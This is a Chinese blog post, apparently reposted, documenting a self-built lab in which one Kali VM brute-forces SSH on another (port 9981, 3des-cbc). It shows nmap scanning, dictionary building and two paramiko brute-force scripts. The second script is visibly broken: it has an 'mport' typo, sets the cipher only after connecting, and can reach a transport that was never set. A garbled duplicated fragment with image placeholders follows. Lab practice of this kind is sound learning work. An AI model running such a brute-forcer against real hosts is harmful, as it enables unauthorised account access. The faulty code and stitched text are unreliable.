本文主要是介绍自搭靶机实现SSH爆破复现记录,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
编写脚本实现ssh爆破。可使用paramiko、pexpect、pxssh等Python模块进行编写。但在ssh服务端将配置加密方式为非常用加密方式3des-cbc,端口为9981端口。
创建 了一个新的Kali虚拟机作为靶机,使用原本的Kali作为攻击机。
设置一个用户为target1234,用户密码为targetpasswd123。
root用户为kaliTarget:
登录进去后查看靶机的IP地址:
相同方法获取攻击机IP:
最后获得攻击机IP:192.168.91.130
靶机IP:192.168.91.129
调节靶机ssh服务端口为9981,加密方式为非常用加密方式3des-cbc,允许root用户通过密码登录:
重启ssh服务:
使用本地连接测试一下有没有设置成功:
链接成功,说明配置生效了。
OK,断开连接:
到这里做好了靶机的准备工作,我们接下来去攻击机上实现ssh攻击:
先使用nmap扫描靶机开放的端口:
发现未扫描到可用端口,加大端口扫描范围:
扫描到9981端口开放:
接下来我们去设置字典方便ssh爆破操作:
初始我们认为靶机密码为5到15位,包含大小写字符和数字。
计算得组合可能为781,514,782,079,074,318,841,757,344种,需要消耗极大的计算资源,所以我们需要继续配置字典策略。
介于密码一般长度,我们设置一组常用字典,包含常用组合和数字,然后组合三次,预计对于n组关键字的字典,能产生n3种密码。
获取关键字:设定场景我们已知靶机账户名,从账户名中获得关键字target,Target,Kali,kali,结合常见字段获得字典。
截图示例(设置字典):
在Kali上安装paramiko模块,截图显示kali上已经存在了该模块,路径为/usr/lib/python3/dist-packages (3.4.0)
书写脚本:
脚本设计策略:选择一组高频关键词词典,使用itertools.permutations
函数完成每三个关键词之间的全排列:
脚本内容:
import paramiko
import socket
from itertools import permutations def ssh_brute_force(target_ip, port, username, password_combinations):client = paramiko.SSHClient()client.set_missing_host_key_policy(paramiko.AutoAddPolicy())for password in password_combinations:try:password_str = ''.join(password)print(f"[*] Trying: {username}:{password_str}")client.connect(target_ip, port=port, username=username, password=password_str, look_for_keys=False, allow_agent=False,ciphers=["3des-cbc"]) # 指定使用3des-cbc加密方式print(f"[+] Success! Username: {username} Password: {password_str}")return Trueexcept paramiko.AuthenticationException:print("[-] Authentication failed.")except socket.error as e:print(f"[!] Connection failed: {e}")except paramiko.SSHException as e:print(f"[!] SSH Error: {e}")return False# 读取文件中的关键词
password_file = 'passwords.txt'
with open(password_file, 'r') as file:keywords = file.read().splitlines()# 生成每三个关键词的全排列组合
password_combinations = list(permutations(keywords, 3))target_ip = '192.168.91.129'
port = 9981
username = 'target1234'# 开始暴力破解
ssh_brute_force(target_ip, port, username, password_combinations)
运行脚本:
报错显示paramiko
的 SSHClient.connect()
方法中不接受 ciphers
作为参数
在建立SSH连接时,先通过 paramiko.Transport
设置允许的加密算法,再通过 Transport
对象连接SSH。
代码:
mport paramiko
import socket
from itertools import permutationsdef ssh_brute_force(target_ip, port, username, password_combinations):for password in password_combinations:try:password_str = ''.join(password)print(f"[*] Trying: {username}:{password_str}")# 创建Transport对象并指定加密算法transport = paramiko.Transport((target_ip, port))transport.connect(username=username, password=password_str)transport.get_security_options().ciphers = ['3des-cbc']# 建立SSH连接client = paramiko.SSHClient()client.set_missing_host_key_policy(paramiko.AutoAddPolicy())client._transport = transportprint(f"[+] Success! Username: {username} Password: {password_str}")transport.close()return Trueexcept paramiko.AuthenticationException:print("[-] Authentication failed.")except socket.error as e:print(f"[!] Connection failed: {e}")except paramiko.SSHException as e:print(f"[!] SSH Error: {e}")finally:transport.close()return False# 读取文件中的关键词
password_file = '/home/f34301/dictionry.txt'
with open(password_file, 'r') as file:keywords = file.read().splitlines()# 生成每三个关键词的全排列组合
password_combinations = list(permutations(keywords, 3))target_ip = '192.168.91.129'
port = 9981
username = 'target1234'# 开始暴力破解
ssh_brute_force(target_ip, port, username, password_combinations)
修改脚本并运行:
可以看到运行成功开始尝试了。
等待代码运行。
最后看到通过我们不懈的努力,终于攻击成功了。
ame, password_combinations)
修改脚本并运行:[外链图片转存中...(img-8jiW3QEx-1725173392168)]可以看到运行成功开始尝试了。等待代码运行。[外链图片转存中...(img-Wgi80inT-1725173392168)]最后看到通过我们不懈的努力,终于攻击成功了。
这篇关于自搭靶机实现SSH爆破复现记录的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!